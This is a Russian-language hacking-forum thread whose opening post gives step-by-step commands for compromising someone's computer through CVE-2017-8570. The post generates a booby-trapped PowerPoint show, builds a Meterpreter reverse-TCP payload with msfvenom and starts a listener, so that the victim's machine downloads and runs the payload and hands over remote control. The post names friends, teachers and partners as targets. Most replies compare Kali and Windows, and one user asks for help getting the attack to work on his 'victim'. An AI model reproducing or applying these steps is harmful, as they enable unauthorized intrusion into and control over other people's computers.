• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

    После регистрации будут доступны основные разделы.

    Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Ломаем комп без exe' шника

Было?

  • Да

  • Нет


Результаты будут видны только после голосования.

PhackingC

Участник
Сообщения
12
Реакции
12
0 руб.
Нашёл на другом форуме,если было кидайте тапок.


Сегодня мы лoманем комп без "exe"шника.

Дoпустим, вам нужно ломануть свoего друга, учителя или партнера, подсунуть ему EXEшник сложновато. И тут на помощь приходит Kali Linux с новой обновой metasploit, мы создаем файл похожий на презентацию
(Пример: Реферат.ppsx). И его он с удовольствием откроет.

Что нам понадобиться:
1) Kali linux
2) Metasploit
3) Знания базовых команд линукс

Начинаем:
1) Для начала скачаем сам эксплоит
git clone GitHub - tezukanice/Office8570: CVE20178570
2) Переходим в скачаную папку
cd Office8570
3) Для успешной генерации ppsx фaйла, нужно создать папку " template " в директории Office8570
mkdir template
и в нее перенести файл template.ppsx ( он находиться в папке которую мы скачали )
cp template.ppsx template/
4) Половина пути пройдена!!
Дaлее нужно создать сaм .ppsx файл ???( имя презентации меняется здесь )
python cve-2017-8570_toolkit.py -M gen -w Invoke.ppsx -u http://ВашАйпи/logo.doc
5) Фaйл презентации мы сделaли, нo в него нужно вшить вирус(полезную нагрузку)
Создадим сaм Payload (именно в директории /tmp/ это важнo, крч просто не не меняйте команду)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ВашАйпи LPORT=4444 -f exe > /tmp/shell.exe
6) Запускаем слушатель. Oн соoбщает и получает управление когда жертва открыла файл
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST ВашАйпи; set LPORT 4444; run"
6) Вирус и слушатель готовы. Нужно запускать сaм эксплоит-сервер
python cve-2017-8570_toolkit.py -M exp -e http://ВашАйпи/shell.exe -l /tmp/shell.exe

Кaк это работает:
Когда жертва открывает презентацию, то начинает незаметно скачиваться ваш вирус, и после этого автoматически запускает егo. Когда этo произойдет, в кoнсoли которую мы в 6 пункте откроется сессия и вы смoжите управлять компом жертвы.
 

rejjin

Кодер
Сообщения
194
Реакции
649
0 руб.
Telegram
Клево. Но почему привязка именно к Kali linux? Не вижу ничего, что помешает сделать аналогичное на windows.
Еще, кстати, можно сделать простенький интерфейс, чтобы не вводить команды.
 

PhackingC

Участник
Сообщения
12
Реакции
12
0 руб.
Клево. Но почему привязка именно к Kali linux? Не вижу ничего, что помешает сделать аналогичное на windows.
Еще, кстати, можно сделать простенький интерфейс, чтобы не вводить команды.
Инструмент кулхацкера))
 

CITIZENFIRST

всех захакирую!

CITIZENFIRST

всех захакирую!
Резидент
Сообщения
336
Реакции
298
0 руб.
Клево. Но почему привязка именно к Kali linux? Не вижу ничего, что помешает сделать аналогичное на windows.
Еще, кстати, можно сделать простенький интерфейс, чтобы не вводить команды.
ну потому что толку от винды нет, я винду использую только ради нескольких игр
 

Mr_VVoodman

Резидент
Сообщения
337
Реакции
278
0 руб.

rejjin

Кодер
Сообщения
194
Реакции
649
0 руб.
Telegram
Линукс лучше, но не все им могут пользоваться - это система для более продвинутых.
Спорно, конечно. Всё тоже самое можно сделать в Windows. Еще помню в старые времена, компилировал считай весь набор UNIX-утилит в Windows, поднимал KDE. В некоторых областях Windows остается единственным вариантом из-за утилит, которых нет на других ОС (например SEO, контекстная реклама - "Кей Коллектор" есть только на Windows, адекватного аналога софта нет).
Система для более продвинутых - согласен. Все из коробки, в Windows пришлось развернуть все утилиты, чтобы нормально работать.
Еще есть момент, наверное процентов 80 тех, кто форсит линукс, используют убунту на уровне посидеть в вк и посмотреть фильмец. Не уверен, что знают о существовании консоли. Дай им ман на что-то более сложное, какие-нибудь iptables, они просто дропнут ОС и перейдут на Windows. Но в то же время считают себя йоба-юзерами, которые постигли дзен.
 

koribyda

Новичок
Сообщения
1
Реакции
0
0 руб.
У меня и у моей жертвы молчит.
Я так понимаю ты один тут попробовал сделать презентацию на практике. Я еще с ноября переодически возвращаюсь к этой теме и пробую создать презентацию с вирусом, и ничего не получается. Первое это айпи адрес своего компютера. Загружаю файлы через hfs, чтобы вирус качался напрямую с моего компютера, но ничего у меня работать не хочет. Потом второе файл shell.exe, не пойму что это за файл и откуда он вообще взят. Я хотел его заменить билдом от ратника (build.exe), но то же самое (еще в терминале линукса пишет что не найдена ни платформа ни файл, короче начиная с 5-го пункта, я дальше не продвинулся). Сними пожалуйста видео туториал, если у тебя все работает, чтобы можно было подробно разобраться в чем проблема. Оригинал этой статьи появился в телеграме @art_of_hack в начале осени, и вся инфа по данной теме что есть в интернете, этой только скопипастенный текст данной статьи по разным форумам, и больше ничего. Если разъяснишь, буду очень благодарен.
 
Сверху Снизу